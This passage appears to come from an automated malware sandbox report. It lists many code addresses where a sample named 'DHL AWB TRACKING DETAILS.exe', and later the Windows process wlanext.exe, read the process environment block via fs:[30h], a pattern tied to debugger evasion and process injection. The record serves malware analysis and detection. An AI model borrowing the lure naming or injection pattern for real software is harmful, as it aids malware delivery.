          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A0C600 mov eax, dword ptr fs:[00000030h]1_2_00A0C600
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A38E00 mov eax, dword ptr fs:[00000030h]1_2_00A38E00
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AC1608 mov eax, dword ptr fs:[00000030h]1_2_00AC1608
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3A61C mov eax, dword ptr fs:[00000030h]1_2_00A3A61C
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3A61C mov eax, dword ptr fs:[00000030h]1_2_00A3A61C
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1766D mov eax, dword ptr fs:[00000030h]1_2_00A1766D
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2AE73 mov eax, dword ptr fs:[00000030h]1_2_00A2AE73
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A17E41 mov eax, dword ptr fs:[00000030h]1_2_00A17E41
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ACAE44 mov eax, dword ptr fs:[00000030h]1_2_00ACAE44
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00ACAE44 mov eax, dword ptr fs:[00000030h]1_2_00ACAE44
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A18794 mov eax, dword ptr fs:[00000030h]1_2_00A18794
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]1_2_00A87794
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]1_2_00A87794
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A87794 mov eax, dword ptr fs:[00000030h]1_2_00A87794
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A437F5 mov eax, dword ptr fs:[00000030h]1_2_00A437F5
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A04F2E mov eax, dword ptr fs:[00000030h]1_2_00A04F2E
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A04F2E mov eax, dword ptr fs:[00000030h]1_2_00A04F2E
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3E730 mov eax, dword ptr fs:[00000030h]1_2_00A3E730
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD070D mov eax, dword ptr fs:[00000030h]1_2_00AD070D
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD070D mov eax, dword ptr fs:[00000030h]1_2_00AD070D
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3A70E mov eax, dword ptr fs:[00000030h]1_2_00A3A70E
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A3A70E mov eax, dword ptr fs:[00000030h]1_2_00A3A70E
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A2F716 mov eax, dword ptr fs:[00000030h]1_2_00A2F716
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A9FF10 mov eax, dword ptr fs:[00000030h]1_2_00A9FF10
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A9FF10 mov eax, dword ptr fs:[00000030h]1_2_00A9FF10
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1FF60 mov eax, dword ptr fs:[00000030h]1_2_00A1FF60
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00AD8F6A mov eax, dword ptr fs:[00000030h]1_2_00AD8F6A
          Source: C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exeCode function: 1_2_00A1EF40 mov eax, dword ptr fs:[00000030h]1_2_00A1EF40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335E730 mov eax, dword ptr fs:[00000030h]11_2_0335E730
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03324F2E mov eax, dword ptr fs:[00000030h]11_2_03324F2E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03324F2E mov eax, dword ptr fs:[00000030h]11_2_03324F2E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334F716 mov eax, dword ptr fs:[00000030h]11_2_0334F716
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E131B mov eax, dword ptr fs:[00000030h]11_2_033E131B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033BFF10 mov eax, dword ptr fs:[00000030h]11_2_033BFF10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033BFF10 mov eax, dword ptr fs:[00000030h]11_2_033BFF10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F070D mov eax, dword ptr fs:[00000030h]11_2_033F070D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F070D mov eax, dword ptr fs:[00000030h]11_2_033F070D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335A70E mov eax, dword ptr fs:[00000030h]11_2_0335A70E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335A70E mov eax, dword ptr fs:[00000030h]11_2_0335A70E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03353B7A mov eax, dword ptr fs:[00000030h]11_2_03353B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03353B7A mov eax, dword ptr fs:[00000030h]11_2_03353B7A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332DB60 mov ecx, dword ptr fs:[00000030h]11_2_0332DB60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333FF60 mov eax, dword ptr fs:[00000030h]11_2_0333FF60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F8F6A mov eax, dword ptr fs:[00000030h]11_2_033F8F6A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F8B58 mov eax, dword ptr fs:[00000030h]11_2_033F8B58
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332F358 mov eax, dword ptr fs:[00000030h]11_2_0332F358
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332DB40 mov eax, dword ptr fs:[00000030h]11_2_0332DB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333EF40 mov eax, dword ptr fs:[00000030h]11_2_0333EF40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03354BAD mov eax, dword ptr fs:[00000030h]11_2_03354BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03354BAD mov eax, dword ptr fs:[00000030h]11_2_03354BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03354BAD mov eax, dword ptr fs:[00000030h]11_2_03354BAD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F5BA5 mov eax, dword ptr fs:[00000030h]11_2_033F5BA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03352397 mov eax, dword ptr fs:[00000030h]11_2_03352397
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335B390 mov eax, dword ptr fs:[00000030h]11_2_0335B390
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03338794 mov eax, dword ptr fs:[00000030h]11_2_03338794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A7794 mov eax, dword ptr fs:[00000030h]11_2_033A7794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A7794 mov eax, dword ptr fs:[00000030h]11_2_033A7794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A7794 mov eax, dword ptr fs:[00000030h]11_2_033A7794
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E138A mov eax, dword ptr fs:[00000030h]11_2_033E138A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03331B8F mov eax, dword ptr fs:[00000030h]11_2_03331B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03331B8F mov eax, dword ptr fs:[00000030h]11_2_03331B8F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033DD380 mov ecx, dword ptr fs:[00000030h]11_2_033DD380
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033637F5 mov eax, dword ptr fs:[00000030h]11_2_033637F5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033503E2 mov eax, dword ptr fs:[00000030h]11_2_033503E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033503E2 mov eax, dword ptr fs:[00000030h]11_2_033503E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033503E2 mov eax, dword ptr fs:[00000030h]11_2_033503E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033503E2 mov eax, dword ptr fs:[00000030h]11_2_033503E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033503E2 mov eax, dword ptr fs:[00000030h]11_2_033503E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033503E2 mov eax, dword ptr fs:[00000030h]11_2_033503E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334DBE9 mov eax, dword ptr fs:[00000030h]11_2_0334DBE9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A53CA mov eax, dword ptr fs:[00000030h]11_2_033A53CA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A53CA mov eax, dword ptr fs:[00000030h]11_2_033A53CA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033DFE3F mov eax, dword ptr fs:[00000030h]11_2_033DFE3F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332E620 mov eax, dword ptr fs:[00000030h]11_2_0332E620
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03364A2C mov eax, dword ptr fs:[00000030h]11_2_03364A2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03364A2C mov eax, dword ptr fs:[00000030h]11_2_03364A2C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03325210 mov eax, dword ptr fs:[00000030h]11_2_03325210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03325210 mov ecx, dword ptr fs:[00000030h]11_2_03325210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03325210 mov eax, dword ptr fs:[00000030h]11_2_03325210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03325210 mov eax, dword ptr fs:[00000030h]11_2_03325210
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332AA16 mov eax, dword ptr fs:[00000030h]11_2_0332AA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332AA16 mov eax, dword ptr fs:[00000030h]11_2_0332AA16
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03343A1C mov eax, dword ptr fs:[00000030h]11_2_03343A1C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335A61C mov eax, dword ptr fs:[00000030h]11_2_0335A61C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335A61C mov eax, dword ptr fs:[00000030h]11_2_0335A61C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332C600 mov eax, dword ptr fs:[00000030h]11_2_0332C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332C600 mov eax, dword ptr fs:[00000030h]11_2_0332C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332C600 mov eax, dword ptr fs:[00000030h]11_2_0332C600
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03358E00 mov eax, dword ptr fs:[00000030h]11_2_03358E00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033E1608 mov eax, dword ptr fs:[00000030h]11_2_033E1608
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03338A0A mov eax, dword ptr fs:[00000030h]11_2_03338A0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334AE73 mov eax, dword ptr fs:[00000030h]11_2_0334AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334AE73 mov eax, dword ptr fs:[00000030h]11_2_0334AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334AE73 mov eax, dword ptr fs:[00000030h]11_2_0334AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334AE73 mov eax, dword ptr fs:[00000030h]11_2_0334AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334AE73 mov eax, dword ptr fs:[00000030h]11_2_0334AE73
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0336927A mov eax, dword ptr fs:[00000030h]11_2_0336927A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033DB260 mov eax, dword ptr fs:[00000030h]11_2_033DB260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033DB260 mov eax, dword ptr fs:[00000030h]11_2_033DB260
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F8A62 mov eax, dword ptr fs:[00000030h]11_2_033F8A62
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333766D mov eax, dword ptr fs:[00000030h]11_2_0333766D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033EEA55 mov eax, dword ptr fs:[00000030h]11_2_033EEA55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033B4257 mov eax, dword ptr fs:[00000030h]11_2_033B4257
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03329240 mov eax, dword ptr fs:[00000030h]11_2_03329240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03329240 mov eax, dword ptr fs:[00000030h]11_2_03329240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03329240 mov eax, dword ptr fs:[00000030h]11_2_03329240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03329240 mov eax, dword ptr fs:[00000030h]11_2_03329240
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03337E41 mov eax, dword ptr fs:[00000030h]11_2_03337E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03337E41 mov eax, dword ptr fs:[00000030h]11_2_03337E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03337E41 mov eax, dword ptr fs:[00000030h]11_2_03337E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03337E41 mov eax, dword ptr fs:[00000030h]11_2_03337E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03337E41 mov eax, dword ptr fs:[00000030h]11_2_03337E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03337E41 mov eax, dword ptr fs:[00000030h]11_2_03337E41
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033EAE44 mov eax, dword ptr fs:[00000030h]11_2_033EAE44
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033EAE44 mov eax, dword ptr fs:[00000030h]11_2_033EAE44
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333AAB0 mov eax, dword ptr fs:[00000030h]11_2_0333AAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0333AAB0 mov eax, dword ptr fs:[00000030h]11_2_0333AAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335FAB0 mov eax, dword ptr fs:[00000030h]11_2_0335FAB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033252A5 mov eax, dword ptr fs:[00000030h]11_2_033252A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033252A5 mov eax, dword ptr fs:[00000030h]11_2_033252A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033252A5 mov eax, dword ptr fs:[00000030h]11_2_033252A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033252A5 mov eax, dword ptr fs:[00000030h]11_2_033252A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033252A5 mov eax, dword ptr fs:[00000030h]11_2_033252A5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F0EA5 mov eax, dword ptr fs:[00000030h]11_2_033F0EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F0EA5 mov eax, dword ptr fs:[00000030h]11_2_033F0EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F0EA5 mov eax, dword ptr fs:[00000030h]11_2_033F0EA5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A46A7 mov eax, dword ptr fs:[00000030h]11_2_033A46A7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335D294 mov eax, dword ptr fs:[00000030h]11_2_0335D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335D294 mov eax, dword ptr fs:[00000030h]11_2_0335D294
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033BFE87 mov eax, dword ptr fs:[00000030h]11_2_033BFE87
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033376E2 mov eax, dword ptr fs:[00000030h]11_2_033376E2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03352AE4 mov eax, dword ptr fs:[00000030h]11_2_03352AE4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033516E0 mov ecx, dword ptr fs:[00000030h]11_2_033516E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F8ED6 mov eax, dword ptr fs:[00000030h]11_2_033F8ED6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03368EC7 mov eax, dword ptr fs:[00000030h]11_2_03368EC7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033536CC mov eax, dword ptr fs:[00000030h]11_2_033536CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033DFEC0 mov eax, dword ptr fs:[00000030h]11_2_033DFEC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03352ACB mov eax, dword ptr fs:[00000030h]11_2_03352ACB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332AD30 mov eax, dword ptr fs:[00000030h]11_2_0332AD30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03333D34 mov eax, dword ptr fs:[00000030h]11_2_03333D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033EE539 mov eax, dword ptr fs:[00000030h]11_2_033EE539
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F8D34 mov eax, dword ptr fs:[00000030h]11_2_033F8D34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033AA537 mov eax, dword ptr fs:[00000030h]11_2_033AA537
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03354D3B mov eax, dword ptr fs:[00000030h]11_2_03354D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03354D3B mov eax, dword ptr fs:[00000030h]11_2_03354D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03354D3B mov eax, dword ptr fs:[00000030h]11_2_03354D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335513A mov eax, dword ptr fs:[00000030h]11_2_0335513A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335513A mov eax, dword ptr fs:[00000030h]11_2_0335513A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03344120 mov eax, dword ptr fs:[00000030h]11_2_03344120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03344120 mov eax, dword ptr fs:[00000030h]11_2_03344120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03344120 mov eax, dword ptr fs:[00000030h]11_2_03344120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03344120 mov eax, dword ptr fs:[00000030h]11_2_03344120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03344120 mov ecx, dword ptr fs:[00000030h]11_2_03344120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03329100 mov eax, dword ptr fs:[00000030h]11_2_03329100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03329100 mov eax, dword ptr fs:[00000030h]11_2_03329100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03329100 mov eax, dword ptr fs:[00000030h]11_2_03329100
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332B171 mov eax, dword ptr fs:[00000030h]11_2_0332B171
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332B171 mov eax, dword ptr fs:[00000030h]11_2_0332B171
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334C577 mov eax, dword ptr fs:[00000030h]11_2_0334C577
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334C577 mov eax, dword ptr fs:[00000030h]11_2_0334C577
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0332C962 mov eax, dword ptr fs:[00000030h]11_2_0332C962
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03347D50 mov eax, dword ptr fs:[00000030h]11_2_03347D50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334B944 mov eax, dword ptr fs:[00000030h]11_2_0334B944
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334B944 mov eax, dword ptr fs:[00000030h]11_2_0334B944
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03363D43 mov eax, dword ptr fs:[00000030h]11_2_03363D43
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A3540 mov eax, dword ptr fs:[00000030h]11_2_033A3540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03351DB5 mov eax, dword ptr fs:[00000030h]11_2_03351DB5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03351DB5 mov eax, dword ptr fs:[00000030h]11_2_03351DB5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03351DB5 mov eax, dword ptr fs:[00000030h]11_2_03351DB5
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A51BE mov eax, dword ptr fs:[00000030h]11_2_033A51BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A51BE mov eax, dword ptr fs:[00000030h]11_2_033A51BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A51BE mov eax, dword ptr fs:[00000030h]11_2_033A51BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A51BE mov eax, dword ptr fs:[00000030h]11_2_033A51BE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F05AC mov eax, dword ptr fs:[00000030h]11_2_033F05AC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033F05AC mov eax, dword ptr fs:[00000030h]11_2_033F05AC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033535A1 mov eax, dword ptr fs:[00000030h]11_2_033535A1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033561A0 mov eax, dword ptr fs:[00000030h]11_2_033561A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033561A0 mov eax, dword ptr fs:[00000030h]11_2_033561A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_033A69A6 mov eax, dword ptr fs:[00000030h]11_2_033A69A6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03352990 mov eax, dword ptr fs:[00000030h]11_2_03352990
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335FD9B mov eax, dword ptr fs:[00000030h]11_2_0335FD9B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335FD9B mov eax, dword ptr fs:[00000030h]11_2_0335FD9B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0335A185 mov eax, dword ptr fs:[00000030h]11_2_0335A185
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03352581 mov eax, dword ptr fs:[00000030h]11_2_03352581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03352581 mov eax, dword ptr fs:[00000030h]11_2_03352581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03352581 mov eax, dword ptr fs:[00000030h]11_2_03352581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03352581 mov eax, dword ptr fs:[00000030h]11_2_03352581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_0334C182 mov eax, dword ptr fs:[00000030h]11_2_0334C182
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03322D8A mov eax, dword ptr fs:[00000030h]11_2_03322D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03322D8A mov eax, dword ptr fs:[00000030h]11_2_03322D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03322D8A mov eax, dword ptr fs:[00000030h]11_2_03322D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03322D8A mov eax, dword ptr fs:[00000030h]11_2_03322D8A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 11_2_03322D8A mov eax, dword ptr fs:[00000030h]11_2_03322D8A
